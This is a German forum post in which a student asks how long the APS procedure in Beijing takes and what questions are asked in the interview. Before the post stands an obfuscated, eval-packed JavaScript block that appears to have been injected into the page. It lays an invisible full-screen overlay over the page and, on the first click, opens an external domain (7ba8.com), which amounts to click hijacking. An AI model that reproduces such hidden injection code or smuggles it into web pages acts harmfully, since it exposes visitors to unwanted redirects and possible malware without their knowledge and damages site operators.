<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>hello,
ich bin
Wally. Ich habe am 18,Dezember mein Formular von Aps nach Beijing geschickt. Nun bereite ich zu Hause Mein fächeres Kenntnis. Aber ich habe
dafür eigene Probleme.
Es ist mir nicht klar, wann ich mich informiere kann, um nach Beijing zu fliegen. Ich habe gehört,es dauert etwa 10 oder 12 Woche vorher.
Aber jetzt dauert es ein bisschen kürzer als früher. Wie langer dauert es eingentlich?
Du weißt, ich studiere Maschinenbau. Und ich habe ein Paar Freude, die Aps bekommen haben. Aber sie studieren die Anderes. Ich möchte Informationen kriegen, was und wie ich vorbereiten muss. Welche Frage wird gestellt?
Wäre es möglich,ich deine Antwort erwarten könne.
|